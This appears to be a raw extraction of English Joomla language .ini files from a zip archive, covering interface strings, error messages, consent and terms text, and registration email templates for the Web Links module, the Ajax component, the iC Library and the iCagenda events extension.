MOD_RELATED_ITEMS_LAYOUT_DEFAULT="Default"PK!ȕ`6�	�	en-GB/en-GB.mod_weblinks.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8

MOD_WEBLINKS="Web Links"
MOD_WEBLINKS_FIELD_CATEGORY_DESC="Choose the Web Links category to display."
MOD_WEBLINKS_FIELD_GROUPBY_DESC="If set to yes, web links will be grouped by subcategories."
MOD_WEBLINKS_FIELD_GROUPBY_LABEL="Group By Subcategories"
MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_DESC="If set to yes, will show groups titles (valid only if grouping)."
MOD_WEBLINKS_FIELD_GROUPBYSHOWTITLE_LABEL="Show Group Title"
MOD_WEBLINKS_FIELD_GROUPBYORDERING_DESC="Ordering for the subcategories (valid only if grouping)."
MOD_WEBLINKS_FIELD_GROUPBYORDERING_LABEL="Group Ordering"
MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_DESC="Direction for the subcategories (valid only if grouping)."
MOD_WEBLINKS_FIELD_GROUPBYDIRECTION_LABEL="Group Ordering Direction"
MOD_WEBLINKS_FIELD_COLUMNS_DESC="When grouping by subcategories, split into # columns."
MOD_WEBLINKS_FIELD_COLUMNS_LABEL="Columns"
MOD_WEBLINKS_FIELD_COUNT_DESC="Number of Web Links to display."
MOD_WEBLINKS_FIELD_COUNT_LABEL="Count"
MOD_WEBLINKS_FIELD_COUNTCLICKS_DESC="If set to yes, the number of times the link has been clicked will be recorded."
MOD_WEBLINKS_FIELD_COUNTCLICKS_LABEL="Count Clicks"
MOD_WEBLINKS_FIELD_DESCRIPTION_DESC="Display Web Link description."
MOD_WEBLINKS_FIELD_DESCRIPTION_LABEL="Description"
MOD_WEBLINKS_FIELD_FOLLOW_DESC="Robots index - allow to follow or not."
MOD_WEBLINKS_FIELD_FOLLOW_LABEL="Follow/No Follow"
MOD_WEBLINKS_FIELD_HITS_DESC="Show hits."
MOD_WEBLINKS_FIELD_HITS_LABEL="Hits"
MOD_WEBLINKS_FIELD_ORDERDIRECTION_DESC="Set the ordering direction."
MOD_WEBLINKS_FIELD_ORDERDIRECTION_LABEL="Direction"
MOD_WEBLINKS_FIELD_ORDERING_DESC="Ordering for the Web Links."
MOD_WEBLINKS_FIELD_ORDERING_LABEL="Ordering"
MOD_WEBLINKS_FIELD_TARGET_DESC="Target browser window when the link is selected."
MOD_WEBLINKS_FIELD_TARGET_LABEL="Target Window"
MOD_WEBLINKS_FIELD_VALUE_ASCENDING="Ascending"
MOD_WEBLINKS_FIELD_VALUE_DESCENDING="Descending"
MOD_WEBLINKS_FIELD_VALUE_FOLLOW="Follow"
MOD_WEBLINKS_FIELD_VALUE_HITS="Hits"
MOD_WEBLINKS_FIELD_VALUE_NOFOLLOW="No follow"
MOD_WEBLINKS_FIELD_VALUE_ORDER="Order"
MOD_WEBLINKS_HITS="Hits"
MOD_WEBLINKS_XML_DESCRIPTION="This modules displays web links from a category defined in the Web Links component."
PK!5΃en-GB/en-GB.com_ajax.ininu&1i�; Joomla! Project
; Copyright (C) 2005 - 2020 Open Source Matters. All rights reserved.
; License GNU General Public License version 2 or later; see LICENSE.txt
; Note : All ini files need to be saved as UTF-8


COM_AJAX="Ajax Interface"
COM_AJAX_XML_DESCRIPTION="An extendable Ajax interface for Joomla."
COM_AJAX_SPECIFY_FORMAT="Please specify a valid response format, other than that of HTML, such as json, raw, debug, etc."
COM_AJAX_METHOD_NOT_EXISTS="Method %s does not exist."
COM_AJAX_FILE_NOT_EXISTS="The file at %s does not exist."
COM_AJAX_MODULE_NOT_ACCESSIBLE="Module %s is not published, you do not have access to it, or it's not assigned to the current menu item."
COM_AJAX_TEMPLATE_NOT_ACCESSIBLE="Template %s is not assigned to the current menu item."
PK!�t]]en-GB/en-GB.lib_ic_library.ininu&1i�; iC Library
; Copyright (c) 2013-2019 Cyril Rezé (www.joomlic.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : lib_ic_library.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda

; Common boolean values
; Note: YES, NO, TRUE, FALSE are reserved words in INI format.
; Double quotes in the values have to be formatted as "_QQ_"

ICLIB_XML_DESCRIPTION="iC Library is a package of code which provides a related group of functions for the Joomla! Content Management System and JoomliC extensions"

; Warning thumb generator
ICLIB_ERROR_ICTHUMB="Error"
ICLIB_ERROR_ICTHUMB_INFO="Unable to create thumbnails"
ICLIB_ERROR_ALERT_IMAGE_TOO_LARGE="Your image <strong>%s</strong> is too large. Please resize it, or extend the memory_limit of your server."
ICLIB_ERROR_IMAGE_TOO_LARGE="Not possible to generate thumbnails. Image too large."
ICLIB_ERROR_MIME_TYPE="Error mime-type !!!"
ICLIB_ERROR_MIME_TYPE_INFO="Your file extension <i>%s</i> is not correct, as the mime-type is <i>%s</i>."
ICLIB_ERROR_MIME_TYPE_NO_THUMBNAIL="Thumbnails cannot be created."
ICLIB_INVALID_PICTURE_LINK="Invalid picture link!"
ICLIB_NOT_AUTHORIZED_IMAGE_TYPE="Wrong image format!"
ICLIB_NOT_AUTHORIZED_IMAGE_TYPE_INFO="Thumbnails creation is compatible with the following formats: jpg, jpeg, png, gif and bmp."
ICLIB_PHP_ERROR_FOPEN="The PHP allow_url_fopen setting is disabled. This setting must be enabled for the copy of remote images (URL). If not, thumbnails may not be created from image url."
ICLIB_PHP_ERROR_FOPEN_COPY_BMP="The PHP allow_url_fopen setting is disabled!"
ICLIB_PHP_ERROR_FOPEN_COPY_BMP_INFO="This setting must be enabled for the creation of thumbnails to work from a bmp url."

; PHP config error message
ICLIB_YOUR_PHP_VERSION_IS="Your PHP version is %s."
ICLIB_PHP_VERSION_JOOMLA_RECOMMENDED="The PHP version recommended by Joomla is %s"
ICLIB_PHP_VERSION_ICAGENDA_RECOMMENDATION="We strongly recommend that you upgrade to this minimum version if at all possible, to prevent eventual issues, bugs, or errors as may happen in future releases of iCagenda"
ICLIB_PHP_ERROR_GD="It looks like GD is not installed on your server! This setting must be enabled for Thumbnail Generator to work."

; Upload image file type control
IC_LIBRARY_UPLOAD_NOT_SUPPORTED="File upload not supported!"
IC_LIBRARY_UPLOAD_INVALID_FILE_TYPE_ALERT="Invalid file type:"
IC_LIBRARY_UPLOAD_INVALID_SIZE="File %s is %s KB! The max limit size is %s KB.<br />Please select another file, or resize it before upload."
IC_LIBRARY_UPLOAD_INVALID_FILE_TYPE="File %s has an invalid file type!<br />You are permitted to upload the following file types: %s<br />Please select another file, or convert it to an accepted file type before upload."
IC_LIBRARY_KILO_BYTES="KB"
PK!�_@Q��en-GB/en-GB.com_icagenda.ininu&1i�; iCagenda
; Copyright (c) 2012-2019 Cyril Rezé (www.icagenda.com). All rights reserved.
; License GNU General Public License version 3 or later <http://www.gnu.org/licenses/gpl.html>
; Note : All ini files need to be saved as UTF-8 - No BOM
;
; SITE                 : com_icagenda.ini
; Translation Platform : https://www.transifex.com/joomlic/icagenda


; iC global strings
IC_ANONYMOUS="Anonymous"
IC_EVENT="Event"
IC_EVENTS="Events"
IC_SELECT="- Select -"
IC_SELECT_AN_OPTION="Select an option"
IC_CHECK="Check"

; Page 404
COM_ICAGENDA_PAGE_NOT_FOUND="Page Not Found"
COM_ICAGENDA_REQUESTED_PAGE_NOT_FOUND="The requested page cannot be found"
COM_ICAGENDA_CONTACT_THE_WEBMASTER_OR_TRY_AGAIN="either contact the Webmaster of this site or try again"
COM_ICAGENDA_USE_YOUR_BROWSERS_BACK_BUTTON="Use your browser's <b>Back</b> button to navigate to the page you have previously visited"
COM_ICAGENDA_OR_JUST_PRESS_BUTTON="Or you could just press this button:"
COM_ICAGENDA_ERROR_EVENT_NOT_FOUND="Event not found"
COM_ICAGENDA_ERROR_THEME_PACK_OUTDATED="The theme pack selected is outdated."
COM_ICAGENDA_ERROR_THEME_PACK_EDIT_OR_CHANGE="Please update the file %s, or select another theme pack to display the list of events."

; Libraries Error Messages
ICAGENDA_CLASS_NOT_FOUND="Class %s not found."
ICAGENDA_CAN_NOT_LOAD="iCagenda can not load for the following reason(s):"
IC_LIBRARY_NOT_LOADED="iC Library is not correctly installed or is not loaded."
ICAGENDA_A_FOLDER_IS_MISSING="A folder is missing."
ICAGENDA_IS_NOT_CORRECTLY_INSTALLED="It seems that extension is not correctly installed."
ICAGENDA_INSTALL_AGAIN="Please install again the component iCagenda."
IC_ALTERNATIVELY="Alternatively"
IC_PLEASE="Please"
IC_LIBRARY_CHECK_PLUGIN_AND_LIBRARY="check if <strong>iC Library</strong> and the <strong>system plugin iC Library</strong> are installed and enabled."
ICAGENDA_UTILITIES_FIX_MANUAL="extract the installation archive and copy the %s directory inside %s directory."
ICAGENDA_INSTALLATION_IS_BROKEN="Your iCagenda installation is broken, please re-install the component."

; Terms & Privacy
COM_ICAGENDA_TERMS_OF_SERVICE="Terms of Service"
COM_ICAGENDA_TERMS_OF_SERVICE_AGREE="I agree to the Terms of Service and i give consent to the processing and storing of the submitted information. I confirm i have all the permissions for the submitted contents."
COM_ICAGENDA_TERMS_OF_SERVICE_NOT_CHECKED_SUBMIT_EVENT="To submit an event you must agree to our terms of service!"

COM_ICAGENDA_TOS="<li>%s reserves the right to approve, edit, reject or remove any event listing on this site for any reason whatsoever.</li> <li>It is unlawful to include discrimination on the basis of sex, age, race, political or religious beliefs unless covered by an exemption under relevant legislation. %s will not accept events listings that appear to be contrary to law.</li><li>You have read the Terms of Service in its entirety and understand what you have read.</li><li>You agree to abide by the Terms of Service established for this site</li>"

COM_ICAGENDA_TERMS_AND_CONDITIONS="Terms and Conditions"
COM_ICAGENDA_TERMS_AND_CONDITIONS_NOT_CHECKED_REGISTRATION="You must agree to our Terms and Conditions!"

; Terms & Privacy - Registration Form
COM_ICAGENDA_REGISTRATION_CONSENT_PERSONAL_DATA_LEGEND="Consent Personal Data"
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_LABEL="My Name Visibility"
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_DESC="Your name may be public in the list of participants at this event."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME="I agree that my name is public."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_USERS_DESC="Your name may be visible to the website logged-in users, in the list of participants at this event."
COM_ICAGENDA_REGISTRATION_CONSENT_NAME_USERS="I agree that my name is visible to the website users."
COM_ICAGENDA_REGISTRATION_CONSENT_GRAVATAR_LABEL="Gravatar"
COM_ICAGENDA_REGISTRATION_CONSENT_GRAVATAR="I allow this website to connect with <a href='https://gravatar.com' target='_blank'>Gravatar.com</a> and display my avatar image."
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER_LABEL="Consent to Organiser"
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER_DESC="When registering for this event, we provide the information entered to the event organiser so they can manage the event and use your email address to send you updates.<br />If you do not want the event organiser to have this information, please do not proceed with your registration."
COM_ICAGENDA_REGISTRATION_CONSENT_ORGANISER="I agree that this website may share my information with the event organiser."
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS_LABEL="Terms & Conditions"
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS_OF_THIS_WEBSITE="%s of this website"
COM_ICAGENDA_REGISTRATION_CONSENT_TERMS="I agree to the %s and i give consent to the processing and storing of the submitted information."

COM_ICAGENDA_REGISTRATION_TERMS="<p>Welcome to [SITENAME].<br />By using or accessing any part of the services, you agree to all of the terms and conditions contained herein and all other operating rules, policies and procedures that may be published from time to time on the site [SITENAME]. If you do not agree to any of such terms, conditions, rules, policies or procedures, do not use or access the services. [SITENAME] reserves the right, at its sole discretion, to modify or replace any of the terms or conditions of this TOS at any time.</p><ol><li><strong>YOUR REGISTRATION OBLIGATIONS</strong><br /><p>To be a registered user of the Services, you agree to: (a) provide true, accurate, current and complete information about yourself as prompted by the Site registration form (the "_QQ_"Registration Data"_QQ_"). If you provide any information that is untrue, inaccurate, not current or incomplete, or [SITENAME] has reasonable grounds to suspect that such information is untrue, inaccurate, not current or incomplete, [SITENAME] has the right to suspend or terminate all of your registrations and refuse any and all of your current or future use of the Services (or any portion thereof). [SITENAME] is concerned about the safety and privacy of all its users, particularly children. For this reason, you must be at least 18 years of age, or the legal age of majority where you reside if that jurisdiction has an older age of majority, to register for an event. </p></li><li><strong>PRIVACY</strong><br /><p>Any information submitted or provided by you to the Services may be publicly accessible. You should take care to protect private information or information that is important to you. [SITENAME] shall not be responsible for protecting any such information and is not liable for the protection of privacy of electronic mail or other information transferred through the Internet or any other network that you may use. Please be aware that if you decide to disclose personally identifiable information on the Services, this information may become public. [SITENAME] does not control and shall not be responsible for the acts of you or any other users (whether Organizers, Buyers, other non-Organizers or otherwise) of the Services.</p></li><li><strong>ACCEPTANCE OF TERMS</strong><br /><p>You have read the Terms and Conditions in its entirety and understand what you have read.<br />You agree to abide by the Terms of Service established for this site</p></li></ol>"

; Icons
; Print
COM_ICAGENDA_PRINT_LABEL="Print"

; Add 2 Cal
COM_ICAGENDA_ADD_TO_CALL_LABEL="Add to Calendar"
COM_ICAGENDA_VCAL_ICAL_LABEL="iCal Calendar"
COM_ICAGENDA_GCALENDAR_LABEL="Google Calendar"
COM_ICAGENDA_OUTLOOK_LABEL="Outlook Calendar"
COM_ICAGENDA_LIVE_CALENDAR_LABEL="Windows Live Calendar"
COM_ICAGENDA_YAHOO_CALENDAR_LABEL="Yahoo Calendar"

; Manager
; Approval of Events
COM_ICAGENDA_APPROVE_AN_EVENT_LBL="Approve this event"
COM_ICAGENDA_APPROVE_AN_EVENT_DESC="To approve this event, click on the icon. You will be redirected and auto-logged in to administration, and you will be able to approve and/or edit this event."
COM_ICAGENDA_APPROVE_AN_EVENT_NOTICE="To approve this event, click on the icon %s"
COM_ICAGENDA_APPROVED="Approved"
COM_ICAGENDA_UNAPPROVED="Unapproved"
COM_ICAGENDA_APPROVED_SUCCESS="Event %s successfully approved"

; Search (in dev.)
;COM_ICAGENDA_SEARCH="Search"
;COM_ICAGENDA_SEARCH_BTN="Search"
COM_ICAGENDA_SEARCH_RESULTS="Search Results:"
COM_ICAGENDA_SEARCH_NO_RESULT="No results found..."

; Events list Header
; SEARCH
COM_ICAGENDA_HEADER_SEARCH_TITLE="Search Results"
COM_ICAGENDA_HEADER_SEARCH_ONE_EVENT="There is %s event in your search results"
COM_ICAGENDA_HEADER_SEARCH_MANY_EVENTS="There are %s events in your search results"
COM_ICAGENDA_HEADER_SEARCH_NO_EVENT="No events matched your search criteria, please try another search"

; ALL
COM_ICAGENDA_HEADER_ALL_TITLE="All Events"
COM_ICAGENDA_HEADER_ALL_ONE_EVENT="There is %s event"
COM_ICAGENDA_HEADER_ALL_MANY_EVENTS="There are %s events"
COM_ICAGENDA_HEADER_ALL_NO_EVENT="No events!"

; TODAY & UPCOMING
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_TITLE="Upcoming Events"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_ONE_EVENT="There is %s upcoming event"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_MANY_EVENTS="There are %s upcoming events"
COM_ICAGENDA_HEADER_TODAY_AND_UPCOMING_NO_EVENT="No upcoming events!"

; PAST
COM_ICAGENDA_HEADER_PAST_TITLE="Past Events"
COM_ICAGENDA_HEADER_PAST_ONE_EVENT="There is %s past event"
COM_ICAGENDA_HEADER_PAST_MANY_EVENTS="There are %s past events"
COM_ICAGENDA_HEADER_PAST_NO_EVENT="No past events!"

; UPCOMING
COM_ICAGENDA_HEADER_UPCOMING_TITLE="Upcoming Events"
COM_ICAGENDA_HEADER_UPCOMING_ONE_EVENT="There is %s upcoming event"
COM_ICAGENDA_HEADER_UPCOMING_MANY_EVENTS="There are %s upcoming events"
COM_ICAGENDA_HEADER_UPCOMING_NO_EVENT="No upcoming events!"

; TODAY
COM_ICAGENDA_HEADER_TODAY_TITLE="Today's Events"
COM_ICAGENDA_HEADER_TODAY_ONE_EVENT="There is %s event today"
COM_ICAGENDA_HEADER_TODAY_MANY_EVENTS="There are %s events today"
COM_ICAGENDA_HEADER_TODAY_NO_EVENT="No event today!"

COM_ICAGENDA_EVENTS_PAGE="Page"
COM_ICAGENDA_EVENTS_PAGE_PER_TOTAL="Page %s/%s"


; Events list Header Filters
COM_ICAGENDA_FILTERS="Search"
COM_ICAGENDA_FILTERS_SEARCH_PLACEHOLDER="Search..."
COM_ICAGENDA_FILTERS_PERIOD_FROM="From"
COM_ICAGENDA_FILTERS_PERIOD_TO="To"
COM_ICAGENDA_FILTERS_SELECT_CATEGORY="- Select Category -"
COM_ICAGENDA_FILTERS_SELECT_MONTH="- Select Month -"
COM_ICAGENDA_FILTERS_SELECT_YEAR="- Select Year -"
COM_ICAGENDA_FILTERS_MORE_OPTIONS="More Options"
COM_ICAGENDA_FILTERS_SUBMIT="Search"
COM_ICAGENDA_FILTERS_RESET="Reset"


; Events List
COM_ICAGENDA_EVENTS_NOIMAGE="no image"
COM_ICAGENDA_EVENTS_MORE_INFO="+ info"
ICAGENDA_THANK_YOU_NOT_TO_REMOVE="Powered by %s"

; Event Details
COM_ICAGENDA_BACK="Back"
COM_ICAGENDA_REGISTRATION_REGISTER="Register"
COM_ICAGENDA_REGISTRATION_EVENT_FULL="Event Full"
COM_ICAGENDA_REGISTRATION_DATE_SOLD_OUT="Date Full"
COM_ICAGENDA_REGISTRATION_REGISTER_ANOTHER_DATE="Select another date"
COM_ICAGENDA_REGISTRATION_EVENT_FINISHED="Event Finished"
COM_ICAGENDA_REGISTRATION_DATE_NO_TICKETS_LEFT="No tickets left for this date"
COM_ICAGENDA_REGISTRATION_CLOSED="Registration Closed"
COM_ICAGENDA_EVENT_CAT="Category"
COM_ICAGENDA_EVENT_DATE="Date"
COM_ICAGENDA_EVENT_COMPLETED="Event Complete"
COM_ICAGENDA_EVENT_PERIOD="Event"
COM_ICAGENDA_PERIOD_FROM="from"
COM_ICAGENDA_PERIOD_TO="to"
COM_ICAGENDA_EVENT_SINGLE_DATES="Single Dates"
COM_ICAGENDA_EVENT_DATE_PAST="Last Date"
COM_ICAGENDA_EVENT_DATE_LAST="Date"
COM_ICAGENDA_EVENT_DATE_FUTUR="Next Date"
COM_ICAGENDA_EVENT_DATE_TODAY="Today"
COM_ICAGENDA_EVENT_DATE_PERIOD_NOW="Now"
COM_ICAGENDA_EVENT_TIME="Time"
COM_ICAGENDA_EVENT_PLACE="Venue"
COM_ICAGENDA_EVENT_CITY="City"
COM_ICAGENDA_EVENT_COUNTRY="Country"
COM_ICAGENDA_EVENT_INFOS="Information"
COM_ICAGENDA_EVENT_PHONE="Telephone"
COM_ICAGENDA_EVENT_MAIL="Email"
COM_ICAGENDA_EVENT_WEBSITE="Website"
COM_ICAGENDA_EVENT_FILE="Attachment"
COM_ICAGENDA_EVENT_DOWNLOAD="Download"
COM_ICAGENDA_EVENT_ADDRESS="Address"
COM_ICAGENDA_EVENT_MAP="Map"
COM_ICAGENDA_EVENT_DATES="All Dates"
COM_ICAGENDA_EVENT_LIST_OF_PARTICIPANTS="List of Participants"
COM_ICAGENDA_NO_REGISTRATION="No Participant"
COM_ICAGENDA_NO_INFOS="No information is available"

COM_ICAGENDA_EVENT_CANCELLED_TEXT="Cancelled"

; Added 3.2.14 - Strings with PLACE to be removed later
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS="Number of seats"
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS_DESC="Total number of seats for this event."
COM_ICAGENDA_EVENT_NUMBER_OF_SEATS_AVAILABLE="Seats available"


; Forms - alert messages
COM_ICAGENDA_FORM_REQUIRED_INFO="All fields with an * are required."
COM_ICAGENDA_FORM_NC="Please make sure the form is complete and valid."
COM_ICAGENDA_FORM_VALIDATE_FIELD_INVALID="Invalid field:"
COM_ICAGENDA_FORM_VALIDATE_FIELD_REQUIRED="Field required:"
COM_ICAGENDA_FORM_VALIDATE_FIELD_REQUIRED_NAME="Field required: %s"
COM_ICAGENDA_FORM_VALIDATE_FIELD_EMAIL2_MESSAGE="The email addresses you entered do not match. Please enter your email address in the email address field and confirm your entry by entering it in the confirm email address field."

; Forms - common strings
IC_FORM_EMAIL_CONFIRM_LBL="Confirm Email"
IC_FORM_EMAIL_CONFIRM_DESC="Confirm your email address."
IC_FORM_EMAIL_CONFIRM_HINT="Re-enter email"
COM_ICAGENDA_CANCEL="Cancel"
COM_ICAGENDA_CAPTCHA_LABEL="Captcha"

; Buttons
COM_ICAGENDA_BUTTON_VIEW_LIST="View List"


; Registration form
COM_ICAGENDA_REGISTRATION_TITLE="Registration"
COM_ICAGENDA_REGISTRATION_YOUR_INFORMATION_LEGEND="Your Information"
ICAGENDA_REGISTRATION_FORM_USERID="User ID"
ICAGENDA_REGISTRATION_FORM_USERID_DESC="User id if registered member"
ICAGENDA_REGISTRATION_FORM_NAME="Name"
ICAGENDA_REGISTRATION_FORM_NAME_DESC="Enter your full name."
ICAGENDA_REGISTRATION_FORM_EMAIL="Email"
ICAGENDA_REGISTRATION_FORM_EMAIL_DESC="Enter your email address."
ICAGENDA_REGISTRATION_FORM_PHONE="Telephone"
ICAGENDA_REGISTRATION_FORM_PHONE_DESC="Phone number will be used only in case of necessity"
ICAGENDA_REGISTRATION_FORM_DATE="Date"
ICAGENDA_REGISTRATION_FORM_DATE_DESC="Select the date you want to register"
ICAGENDA_REGISTRATION_FORM_PERIOD="Event period"
ICAGENDA_REGISTRATION_FORM_PERIOD_DESC="Register to all event period"
ICAGENDA_REGISTRATION_FORM_PEOPLE="Number of tickets"
ICAGENDA_REGISTRATION_FORM_PEOPLE_DESC="Number of persons attending including you"
ICAGENDA_REGISTRATION_FORM_NOTES="Notes"
ICAGENDA_REGISTRATION_FORM_NOTES_DESC="Enter your message here."
ICAGENDA_REGISTRATION_FORM_SUBMIT="Submit"
COM_ICAGENDA_REGISTRATION_NUMBER_PLACES="Number of seats"
COM_ICAGENDA_REGISTRATION_NUMBER_PLACES_DESC="Number of persons attending including you"
COM_ICAGENDA_REGISTRATION_PLACES_LEFT="Seats available"
COM_ICAGENDA_REGISTRATION_ALREADY_BOOKED="Already booked"
COM_ICAGENDA_REGISTRATION_TY="Thank you"
COM_ICAGENDA_REGISTRATION_COMPLETE_SUCCESS="Registration completed."
COM_ICAGENDA_REGISTRATION_COMPLETE_CONFIRMED="Your registration to event <i>%s</i> is now confirmed!"
COM_ICAGENDA_REGISTRATION_DATE="Date"
COM_ICAGENDA_REGISTRATION_DATES="Dates"
COM_ICAGENDA_REGISTRATION_SUMMARY_LEGEND="%s Summary"
COM_ICAGENDA_REGISTRATION_SUMMARY_REGISTRATION="Registration"

COM_ICAGENDA_REGISTRATION_REGISTER_BTN="Register"

;COM_ICAGENDA_REGISTRATION_CANCEL_LABEL="Registration Cancellation"
COM_ICAGENDA_REGISTRATION_CANCEL_LEGEND="Cancel Registration?"
COM_ICAGENDA_REGISTRATION_CANCEL_SELECT_DATES="Select date(s) to cancel."
COM_ICAGENDA_REGISTRATION_CANCEL_ALL_DATES="All Dates"
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRM_WARNING="Confirming will cancel your registration for %s on the selected dates(s)!"
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRM_BUTTON="Yes, Cancel Registration"
COM_ICAGENDA_REGISTRATION_CANCEL_DENY_BUTTON="No, Keep Registration"
COM_ICAGENDA_REGISTRATION_CANCEL_OTHER_DATES_BUTTON="Cancel Other Dates?"
COM_ICAGENDA_REGISTRATION_CANCEL_SUCCESS="Registration cancelled."
COM_ICAGENDA_REGISTRATION_CANCEL_CONFIRMED="Your registration to event <i>%s</i> is now cancelled."
COM_ICAGENDA_REGISTRATION_CANCEL_NONE="No registration to cancel."
COM_ICAGENDA_REGISTRATION_CANCEL_USERACTION_SUBJECT="Registration Cancellation"
COM_ICAGENDA_REGISTRATION_CANCEL_USERACTION_BODY="User has cancelled his registration."

COM_ICAGENDA_REGISTRATION_N_TICKETS="%s Tickets"
COM_ICAGENDA_REGISTRATION_N_TICKETS_1="%s Ticket"

COM_ICAGENDA_REGISTERED_EVENT_PERIOD="Event: from %s %s to %s %s"
COM_ICAGENDA_REGISTERED_EVENT_DATE="Event date: %s %s"
COM_ICAGENDA_REGISTRATION_EVENT_LINK="View Event"
COM_ICAGENDA_REGISTRATION_EMAIL_ALERT="You have already registered for this event with email address :"
COM_ICAGENDA_REGISTRATION_EMAIL_NOT_VALID="Your email address does not seem valid, thank you to verify your entry and try again."
COM_ICAGENDA_REGISTRATION_NAME_NOT_VALID="The name %s contains invalid characters.<br /> A name cannot contain any of the following characters: / \ < > "_QQ_" [ ] ( ) &#37; ;=+ &"
COM_ICAGENDA_REGISTRATION_NAME_MINIMUM_CHARACTERS="A name must contain a minimum of 2 characters."
COM_ICAGENDA_ALERT_NO_TICKET_AVAILABLE_EVENT="There is no ticket available for this event."
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE="There are not enough tickets available."
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE_NOW="At the moment, it remains %s ticket(s) available until you or another person validates a new registration."
COM_ICAGENDA_ALERT_NOT_ENOUGH_TICKETS_AVAILABLE_CHANGE_NUMBER=" Thank you kindly change the number of tickets to the extent of available seats."
COM_ICAGENDA_ALERT_NO_TICKETS_AVAILABLE="No tickets available."
;
; Registration Emails
COM_ICAGENDA_REGISTRATION_EMAIL_USER_PERIOD_DEFAULT_SUBJECT="Your registration to event '[TITLE]' on [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_PERIOD_DEFAULT_BODY="Hello [NAME],\n\nYou have registered to event '[TITLE]'.\n\nIf you want to see again the details of this event, please click on the following link or, if it's not clickable, copy and paste it to your browser.\n[EVENTURL]\n\nThis email contains your personal information entered when registering for this event on the website [SITEURL].\n\nName: [NAME]\nEmail: [EMAIL]\nPhone: [PHONE]\nNb of tickets: [PLACES]\nPeriod: from [STARTDATETIME] to [ENDDATETIME]\n[CUSTOMFIELDS]\nNotes: [NOTES]\n\nYou can request information, modify your personal details or cancel your registration by sending an email to: [AUTHOREMAIL]\n\nBest regards,\n[SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_DATE_DEFAULT_SUBJECT="Your registration to event '[TITLE]' on [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_USER_DATE_DEFAULT_BODY="Hello [NAME],\n\nYou have registered to event '[TITLE]'.\n\nIf you want to see again the details of this event, please click on the following link or, if it's not clickable, copy and paste it to your browser.\n[EVENTURL]\n\nThis email contains your personal information entered when registering for this event on the website [SITEURL].\n\nName: [NAME]\nEmail: [EMAIL]\nPhone: [PHONE]\nNb of tickets: [PLACES]\nDate : [DATETIME]\n[CUSTOMFIELDS]\nNotes: [NOTES]\n\nYou can request information, modify your personal details or cancel your registration by sending an email to: [AUTHOREMAIL]\n\nBest regards,\n[SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_DEFAULT_SUBJECT="New registration to event '[TITLE]' on [SITENAME]"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_PERIOD_DEFAULT_BODY="New registration to event '[TITLE]'.\n\nURL: [EVENTURL]\n\nName: [NAME]\nEmail: [EMAIL]\nPhone: [PHONE]\nNb of tickets: [PLACES]\nPeriod: from [STARTDATETIME] to [ENDDATETIME]\n[CUSTOMFIELDS]\nNotes: [NOTES]\n"
COM_ICAGENDA_REGISTRATION_EMAIL_ADMIN_DATE_DEFAULT_BODY="New registration to event '[TITLE]'.\n\nURL: [EVENTURL]\n\nName: [NAME]\nEmail: [EMAIL]\nPhone: [PHONE]\nNb of tickets: [PLACES]\nDate : [DATETIME]\n[CUSTOMFIELDS]\nNotes: [NOTES]\n"
COM_ICAGENDA_NOT_SPECIFIED="Not Specified"


; Submit an Event Form
COM_ICAGENDA_TITLE_EVENT="Event"
;
; User information
COM_ICAGENDA_LEGEND_USERINFOS="Your information"
COM_ICAGENDA_SUBMIT_FORM_USER_NAME="Name"
COM_ICAGENDA_SUBMIT_FORM_USER_NAME_DESC="Full name, or username for registered member"
COM_ICAGENDA_SUBMIT_FORM_USER_EMAIL="Email"
COM_ICAGENDA_SUBMIT_FORM_USER_EMAIL_DESC="Valid email address on which to receive approval notification."
;
; Panel Event
COM_ICAGENDA_LEGEND_NEW_EVENT="New Event"
COM_ICAGENDA_LEGEND_EDIT_EVENT="Edit event"
COM_ICAGENDA_FORM_LBL_EVENT_TITLE="Title"
COM_ICAGENDA_FORM_DESC_EVENT_TITLE="Title of the event"
COM_ICAGENDA_FORM_LBL_EVENT_USERNAME="Username"
COM_ICAGENDA_FORM_DESC_EVENT_USERNAME="Editor's Username"
COM_ICAGENDA_FORM_LBL_EVENT_CATID="Category"
COM_ICAGENDA_FORM_DESC_EVENT_CATID="Select the category to which belong in the event"
;
; Panel Attachments
COM_ICAGENDA_LEGEND_ALLEG="Attachments"
COM_ICAGENDA_FORM_LBL_EVENT_IMAGE="Event Image"
COM_ICAGENDA_FORM_DESC_EVENT_IMAGE="Image for the event"
COM_ICAGENDA_FORM_LBL_EVENT_FILE="File"
COM_ICAGENDA_FORM_DESC_EVENT_FILE="Attach a file to the event"
;
COM_ICAGENDA_LEGEND_DATES="Dates"
;
; Panel Dates
COM_ICAGENDA_DATES_HELP="Note about dates"
COM_ICAGENDA_DATES_HELP_INTRO="You can add an event taking place over a period, with a start date and an end date, and/or single dates:"
COM_ICAGENDA_DATES_HELP_LINE1="Event with a single date, and a start time"
